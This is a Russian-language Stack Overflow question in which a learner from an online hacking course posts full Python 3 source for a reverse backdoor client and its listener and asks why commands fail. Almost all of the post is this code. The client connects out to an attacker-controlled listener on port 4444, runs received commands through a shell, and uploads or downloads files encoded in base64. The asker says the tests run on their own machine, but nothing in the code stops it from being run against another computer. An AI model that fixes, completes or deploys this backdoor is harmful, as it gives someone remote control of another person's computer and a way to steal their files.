# Продолжаю писать Listener + Reverse_backdoor

Tags: python, python-3.x, json, listener, reverse

Пишу скрипт которым буду управлять другим компом (естественно тестирую на своей системе) удалённо, скрипты пишу с помощью онлайн курсов, в курсах используют Python2, а я использую Python3. Помогите пожалуйста в чем может быть проблема, мои команды не хотят реализовываться, мне кажется что это все из-за JSON, но до конца не уверен. Из-за того что добавил исключение, соединение держится, но команды не работают и просто выводиться: [-] Error during command execution.

Код сервера:

```
import socket, json, base64


class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print('[+] Waiting for incoming connections')
        self.connection, address = listener.accept()
        print('[+] Got a connection from ' + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = b''
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command.encode())

        if command[0] == 'exit':
            self.connection.close()
            exit()
        return self.reliable_receive()

    def write_file(self, path, content):
        with open(path, 'wb') as file:
            file.write(base64.b64decode(content))
            return  "[+] Download successful."

    def read_file(self, path):
        with open(path, 'rb') as file:
            return base64.b64encode(file.read())

    def run(self):
        while True:
            command = input('>> ')
            command = command.split(' ')

            try:
                if command[0] == "upload":
                    file_content = self.read_file(command[1])
                    command.append(file_content)

                result = self.execute_remotely(command)

                if command[0] == "download" and "[-] Error " not in result:
                    result = self.write_file(command[1], result)
            except Exception:
                result = "[-] Error during command execution."

            print(result)

my_listener = Listener('0.0.0.0', 4444)
my_listener.run()
```

Код клиента:

```
import os
import socket
import subprocess
import json
import base64


class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = b''
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_system_command(self, command):
        return subprocess.check_output(command.decode('utf-8'), shell=True)

    def change_working_directory_to(self, path):
        os.chdir(path)
        return "[+] Changing working directory to " + path

    def read_file(self, path):
        with open(path, 'rb') as file:
            return base64.b64encode(file.read())

    def write_file(self, path, content):
        with open(path, 'wb') as file:
            file.write(base64.b64decode(content))
            return "[+] Upload successful."

    def run(self):
        while True:
            command = self.reliable_receive()
            try:
                if command[0] == 'exit':
                    self.connection.close()
                    exit()
                elif command[0] == 'cd' and len(command) > 1:
                    command_result = self.change_working_directory_to(command[1])
                elif command[0] == 'download':
                    command_result = self.read_file(command[1])
                elif command[0] == 'upload':
                    command_result = self.write_file(command[1], command[2])
                else:
                    command_result = self.execute_system_command(command)
            except Exception:
                command_result = '[-] Error during command execution'

            self.reliable_send(command_result)

my_backdoor = Backdoor('0.0.0.0', 4444)
my_backdoor.run()
```

Comment: Узнать причину исключения пробовали?

Comment: @MikhailMurugov да конечно, вот ссылка с данным вопросом https://ru.stackoverflow.com/questions/1397181/Добавил-библиотеку-json-при-использовании-listenera-выдает-ошибку?noredirect=1#comment2486154_1397181 из-за этой ошибки выходит исключение, но как теперь реализовать остальные функции без JSON, я не знаю, потому что в курсе никаких альтернатив не предлагается

Comment: @MikhailMurugov вот тут полное описание двух скриптов https://stackoverflow.com/questions/71850809/ive-issue-with-my-listener-object-of-type-bytes-is-not-json-serializable-pytho